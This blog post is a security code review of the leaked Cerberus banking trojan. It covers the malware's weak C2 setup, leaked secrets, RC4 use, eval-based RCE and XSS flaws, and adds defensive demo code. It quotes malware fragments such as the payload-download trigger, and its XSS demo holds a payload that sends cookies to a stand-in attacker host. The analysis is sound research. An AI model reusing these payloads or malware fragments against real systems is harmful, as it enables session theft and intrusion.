Security Code Review of a Banking Trojan — Cerberus

    Over a year ago, I started hearing about a new banking Trojan called Cerberus. The author of this malware reportedly used to ridicule security researchers on social media, as per this article. The malware was sold as a complete package:

    • MySQL seed data with payloads and logos to masquerade as a number of popular banking apps
    • React.js-based admin panel with a PHP-based REST API for a modern C2 experience

    Cerberus Admin Panel (Source: image link not preserved)

    Malware, as one would expect, is usually heavily obfuscated, making it difficult to analyze and understand the original source code. As a next-gen static analysis company, our tools depend on the availability of source code and a buildable environment.

    Recently, the source code for Cerberus was leaked on GitHub, giving me an opportunity to review it and perform static analysis using the tools we build at ShiftLeft.

    This blog summarizes some of my findings from this analysis.

    Rudimentary C2 server hardening

    The install script uses torsocks to download the server components. However, the actual C2 server PHP code simply runs behind nginx and serves over plain HTTP. The client Android app also communicates back with the server over HTTP. In the default setup, the server panel can also be reached over a public IP without any authentication.

    Lack of secrets management: the install script requests a root password on the command line during installation.

    echo "Enter root password:"
    read password

    This password is then:

    • Stored in /var/www/config.php as define('passwd', '$password'); in plain text
    • Used to create a non-root MySQL user with all privileges, sharing the same password

    mysql -uroot --password="$password" -e "CREATE USER 'non-root'@'localhost' IDENTIFIED BY '$password';"
    mysql -uroot --password="$password" -e "GRANT ALL PRIVILEGES ON *.* TO 'non-root'@'localhost';"

    Despite its name, the "non-root" account is granted ALL PRIVILEGES ON *.*, so it is root in everything but name, and it shares root's password.

    Sensitive data leaks

    No software should leak sensitive data openly in log files. Malware in particular should not reveal its existence and should mask any signs of its presence.

    Cerberus, unusually, is full of logging code. Much of the sensitive information that gets collected or retrieved from the server is openly logged.

    Some examples:

    public String string_80 = "EnCryptResponce: ";
    public String string_81 = "CheckBotRESPONCE: ";
    public String string_82 = "||youNeedMoreResources||";

    Given the above obfuscated strings, it was possible to identify numerous sensitive data leaks using ShiftLeft Next Gen.

    utl.Log(TAG_LOG, consts.string_80 + response);
    response = utl.trafDeCr(response);
    utl.Log(TAG_LOG, consts.string_81 + response);

    And another:

    response = utl.trafDeCr(context, response);
    utl.Log(TAG_LOG, "RESPONCE: " + response);

    Over 20 instances of such leaks were discovered by our tool.

    Lack of a formal API contract

    Even though there is a REST API server, most of the communication with the Android app in fact uses primitive strings to trigger various functionalities over HTTP.

    Plain-text strings such as ||youNeedMoreResources|| are used as a signal to download additional payloads.

    if (response.contains("||youNeedMoreResources||")
            && (!utl.SettingsRead(context, consts.statDownloadModule).equals(consts.str_1))) {
        // downloading module
        utl.downloadModuleDex(this, idbot);
        utl.Log("download", "run");
    }

    By looking for method calls containing response.contains, I could gather all such strings for various operations such as capturing keystrokes, taking screenshots, disabling Play Protect, and so on.
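    The two manual searches described above (logging of decrypted responses, and the magic strings matched with response.contains) can be reproduced with a small scanner. The block below is an added example, not Cerberus code: it runs over constructed Java-like source that imitates the quoted snippets. The method names utl.Log, utl.trafDeCr and response.contains come from the quotes; the sample source itself and every command string other than ||youNeedMoreResources|| are constructed for the demonstration.

```javascript
// Added example, not Cerberus code: a small scanner over constructed Java-like
// source that reproduces the two manual searches described in the post, i.e.
// finding utl.Log calls that print decrypted C2 data and collecting the magic
// strings the bot matches with response.contains. Method names are taken from
// the quoted snippets; the sample source and the command strings other than
// ||youNeedMoreResources|| are constructed.

const SAMPLE_SOURCE = `
utl.Log(TAG_LOG, consts.string_80 + response);
response = utl.trafDeCr(response);
utl.Log(TAG_LOG, consts.string_81 + response);
String cfg = utl.trafDeCr(context, body);
utl.Log(TAG_LOG, "cfg=" + cfg);
utl.Log(TAG_LOG, "tick");
if (response.contains("||youNeedMoreResources||") && (!downloaded)) {
    // downloading module
    utl.downloadModuleDex(this, idbot);
}
if (response.contains("||startKeylogger||")) { startKeylogger(); }
if (response.contains("||takeScreenshot||")) { takeScreenshot(); }
`;

// Finding 1: decrypted traffic written to the log. Every identifier assigned
// from utl.trafDeCr(...) is treated as tainted; any later utl.Log(...) whose
// arguments mention it is reported. This is a one-pass, single-method
// approximation of the taint tracking a SAST tool performs across a code base.
// Note that the first log line (encrypted response, before trafDeCr) is not
// reported: the scanner only flags decrypted data.
function findLoggedDecryptedData(source) {
  const tainted = new Set();
  const findings = [];
  source.split('\n').forEach((line, idx) => {
    const assign = line.match(/^\s*(?:\w+\s+)?(\w+)\s*=\s*utl\.trafDeCr\(/);
    if (assign) tainted.add(assign[1]);
    const log = line.match(/utl\.Log\((.*)\)\s*;/);
    if (!log) return;
    for (const name of tainted) {
      if (new RegExp(`\\b${name}\\b`).test(log[1])) {
        findings.push({ line: idx + 1, variable: name, code: line.trim() });
        break;
      }
    }
  });
  return findings;
}

// Finding 2: the "API contract" is a set of magic substrings. Collect each
// literal passed to response.contains together with the first call made in the
// branch it guards; the result is the bot's command vocabulary. The pattern
// assumes the `if (response.contains("...") ...) { call(` shape of the quoted
// snippet, with an optional line comment before the call.
function extractCommandStrings(source) {
  const commands = new Map();
  const re = /response\.contains\("([^"]+)"\)[^{]*\{\s*(?:\/\/[^\n]*\n\s*)?([\w.]+)\(/g;
  for (const m of source.matchAll(re)) {
    if (!commands.has(m[1])) commands.set(m[1], m[2]);
  }
  return commands;
}

// Stand-alone run: print what the scanner found.
console.log(findLoggedDecryptedData(SAMPLE_SOURCE));
console.log(Object.fromEntries(extractCommandStrings(SAMPLE_SOURCE)));
```

    On the constructed input the scanner reports the two log calls that print decrypted data (the raw encrypted response logged before trafDeCr is deliberately not reported) and maps each command string to the handler it triggers.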

    Cerberus Trojan screen overlay (Source: image link not preserved)

    Weak Encryption Algorithm

    Weak algorithms such as RC4 are used in a number of places. The hex and base64 wrapping seen here only encodes the RC4 output; it adds no protection:

    return base64_encode(bin2hex(RC4Crypt::encrypt_($key, $string)));
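    Why a fixed-key RC4 transport is weak is easiest to see by running it. The block below is an added example, not Cerberus code: a plain RC4 implementation, the same base64-over-hex wrapping as the quoted PHP line, and a keystream-reuse recovery. RC4 is a stream cipher with no nonce, so one key always produces one keystream, and two messages encrypted under that key XOR to the XOR of their plaintexts. The key and both messages are constructed for the demonstration.

```javascript
// Added example, not Cerberus code: a plain RC4 implementation used to show why
// the fixed-key RC4 transport quoted in the post is weak. The key and messages
// are constructed; the encrypt/decrypt wrappers mirror the quoted PHP
// (base64 over hex over RC4). Runs under Node.js.

const toBytes = (s) => Array.from(Buffer.from(s, 'utf8'));
const toText = (b) => Buffer.from(b).toString('utf8');

// Key-scheduling algorithm followed by the PRGA; returns `length` keystream bytes.
function rc4Keystream(key, length) {
  const S = Array.from({ length: 256 }, (_, i) => i);
  let j = 0;
  for (let i = 0; i < 256; i++) {
    j = (j + S[i] + key[i % key.length]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
  }
  const out = [];
  let i = 0;
  j = 0;
  for (let n = 0; n < length; n++) {
    i = (i + 1) & 0xff;
    j = (j + S[i]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
    out.push(S[(S[i] + S[j]) & 0xff]);
  }
  return out;
}

// Encryption and decryption are the same XOR against the keystream.
function rc4(key, data) {
  const ks = rc4Keystream(key, data.length);
  return data.map((b, idx) => b ^ ks[idx]);
}

// Known-answer check against the public RC4 test vector:
// key "Key", plaintext "Plaintext" -> bbf316e8d940af0ad3.
function selfTest() {
  return Buffer.from(rc4(toBytes('Key'), toBytes('Plaintext'))).toString('hex') === 'bbf316e8d940af0ad3';
}

// Mirror of the quoted wrapper: base64(hex(rc4(...))). Both outer layers are
// encodings; stripping them leaves raw RC4 output.
function encryptLikePanel(key, plaintext) {
  const hex = Buffer.from(rc4(key, toBytes(plaintext))).toString('hex');
  return Buffer.from(hex, 'utf8').toString('base64');
}
function decryptLikePanel(key, encoded) {
  const hex = Buffer.from(encoded, 'base64').toString('utf8');
  return toText(rc4(key, Array.from(Buffer.from(hex, 'hex'))));
}

// Keystream reuse: given two ciphertexts under the same key and one known
// plaintext, the other plaintext falls out without the key, because
// c1 ^ c2 == p1 ^ p2. Recovery covers the length of the known plaintext.
function recoverWithKnownPlaintext(c1, c2, knownPlaintext) {
  const p1 = toBytes(knownPlaintext);
  const n = Math.min(c1.length, c2.length, p1.length);
  const out = [];
  for (let i = 0; i < n; i++) out.push(c1[i] ^ c2[i] ^ p1[i]);
  return toText(out);
}

const KEY = toBytes('demo-static-key');                          // constructed
const MSG_KNOWN = 'CheckBot: id=1001 status=ok';                 // constructed, assumed known to the analyst
const MSG_SECRET = 'CheckBot: id=1002 ||youNeedMoreResources||'; // constructed
const C_KNOWN = rc4(KEY, toBytes(MSG_KNOWN));
const C_SECRET = rc4(KEY, toBytes(MSG_SECRET));

console.log('RC4 self-test:', selfTest());
console.log('recovered without the key:', recoverWithKnownPlaintext(C_KNOWN, C_SECRET, MSG_KNOWN));
```

    An analyst who captures C2 traffic and knows (or can guess) one message, for instance a predictable check-in, recovers the matching prefix of every other message under the same key without ever touching the key material. RC4 also has well-known keystream biases, but the fixed-key deployment alone is already enough to break confidentiality.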

    RCE vulnerabilities in the panel app

    The admin panel contains vulnerable eval functions.

    export function try_eval(command) {
        //console.log("Called: " + command);
        eval('try {' + command + '} catch (err) { console.log("Error: " + err ) } ');
    }

    There were more instances of RCE, since no payload or image data that could be uploaded is ever validated or sanitized.

    The developer is in fact aware of this:
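    The block below is an added example, not panel code: the quoted try_eval beside a dispatcher that runs only named, allowlisted actions. The action names and their arguments (refreshBots, sendCommand, botId, cmd) are assumptions for the demonstration, not the panel's real operations.

```javascript
// Added example, not panel code: the quoted try_eval beside a dispatcher that
// runs only named, allowlisted actions. The action names and arguments
// (refreshBots, sendCommand, botId, cmd) are assumptions for the demonstration.

// Vulnerable: whatever string reaches `command` is compiled and run as
// JavaScript in the operator's browser, with the panel's origin and session.
function try_eval(command) {
  eval('try {' + command + '} catch (err) { console.log("Error: " + err) }');
}

// Hardened: a frozen table of named handlers. Input only selects an entry and
// is passed through as data; nothing derived from it is ever evaluated.
const ACTIONS = Object.freeze({
  refreshBots: (args) => ({ action: 'refreshBots', limit: Number(args.limit) || 50 }),
  sendCommand: (args) => {
    if (!/^\d+$/.test(String(args.botId))) throw new Error('botId must be numeric');
    return { action: 'sendCommand', botId: String(args.botId), cmd: String(args.cmd) };
  },
});

function dispatch(name, args = {}) {
  // hasOwnProperty keeps names such as "constructor" or "__proto__" from
  // resolving through the prototype chain to something callable.
  if (!Object.prototype.hasOwnProperty.call(ACTIONS, name)) {
    throw new Error('unknown action: ' + name);
  }
  return ACTIONS[name](args);
}

// Harmless probe standing in for a payload: it proves that try_eval executes
// arbitrary code handed to it as a string, while dispatch rejects the same input.
const PROBE = 'globalThis.__evalProbe = "executed"';

try_eval(PROBE);
console.log('try_eval ran the probe:', globalThis.__evalProbe === 'executed');
try {
  dispatch(PROBE);
} catch (err) {
  console.log('dispatch refused it:', err.message);
}
console.log(dispatch('sendCommand', { botId: '1001', cmd: 'screenshot' }));
```

    The try/catch wrapper in the original only hides errors; it does nothing to limit what the evaluated string can do. A dispatch table turns "run this text" into "run this one known function with this data", which is the property the panel needs.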

    console.log('%c Don\'t use this console! ', 'font-size:18px; background: #002b36; color: #a7a89b');

    Vulnerable dependencies (OWASP A9)

    Many outdated dependencies are in use:

    Dependency Scan Summary (nodejs)
    ╔═════════════╤═══════╤════════╗
    ║ Severity    │ Count │ Status ║
    ╟─────────────┼───────┼────────╢
    ║ UNSPECIFIED │ 0     │ ✅     ║
    ║ LOW         │ 3     │ ✅     ║
    ║ MEDIUM      │ 2     │ ✅     ║
    ║ HIGH        │ 3     │ ❌     ║
    ║ CRITICAL    │ 0     │ ✅     ║
    ╚═════════════╧═══════╧════════╝

    XSS Vulnerabilities in C2 panel

    The panel was a goldmine for XSS vulnerabilities.

    Almost all text fields were vulnerable, as if the developer wanted things to be vulnerable. Even some static blocks were vulnerable to reflected XSS.

    // The markup tags were stripped from this copy of the snippet; the table-cell
    // tags below are reconstructed to show the shape of the concatenation. The
    // point is unchanged: each field is echoed into HTML without any escaping.
    echo "<tr>" .
        "<td>" . $data["ID"] . "</td>" .
        "<td>" . $data["contact"] . "</td>" .
        "<td>" . $data["domain"] . "</td>" .
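    The block below is an added example, not panel code: the echoed table row above rebuilt in JavaScript, with the unescaped rendering beside an escaped one. The field names (ID, contact, domain) are the ones in the quoted PHP; the record values are constructed. On a C2 panel these fields are reported by infected devices, so a value chosen on the victim side can carry a payload aimed at the operator's browser.

```javascript
// Added example, not panel code: the echoed table row from the post rebuilt in
// JavaScript, with the unescaped rendering beside an escaped one. Field names
// (ID, contact, domain) come from the quoted PHP; the record is constructed.

// Escapes the five characters that matter in HTML text and double-quoted
// attribute contexts. Not sufficient on its own for URL, JavaScript or CSS contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: mirrors the quoted echo, concatenating fields straight into markup.
function renderRowUnsafe(data) {
  return '<tr><td>' + data.ID + '</td><td>' + data.contact + '</td><td>' + data.domain + '</td></tr>';
}

// Hardened: every interpolated value is escaped for the HTML text context.
function renderRow(data) {
  return '<tr><td>' + escapeHtml(data.ID) + '</td><td>' + escapeHtml(data.contact) +
    '</td><td>' + escapeHtml(data.domain) + '</td></tr>';
}

// Number of tag openers in the output; the row template itself contributes 8.
// Any count above 8 means a field value became live markup.
function tagCount(html) {
  return (html.match(/</g) || []).length;
}

// Constructed record: a "bot" whose contact field is an XSS payload.
const HOSTILE_RECORD = {
  ID: 1001,
  contact: '<img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">',
  domain: 'bank.example',
};

console.log(renderRowUnsafe(HOSTILE_RECORD)); // payload lands in the page as live markup
console.log(renderRow(HOSTILE_RECORD));       // payload is shown as inert text
```

    For a panel built on a templating layer that escapes by default this is a non-issue; hand-written echo statements like the one above get no such help, and every field from the database has to be escaped explicitly for the context it is placed in.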

    Closing thoughts

    Performing a security code review of a piece of malware is certainly out of the ordinary for me. However, this exercise highlighted a known reality: even malware authors are not perfect developers who think about security while coding. The kind of security flaws seen in this malware indicate that the product was either rushed through, or the developer behind Cerberus simply did not bother about security or lacks experience.

    Security Code Review of a Banking Trojan — Cerberus was originally published in ShiftLeft Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

    *** This is a Security Bloggers Network syndicated blog from ShiftLeft Blog – Medium authored by Prabhu Subramanian.
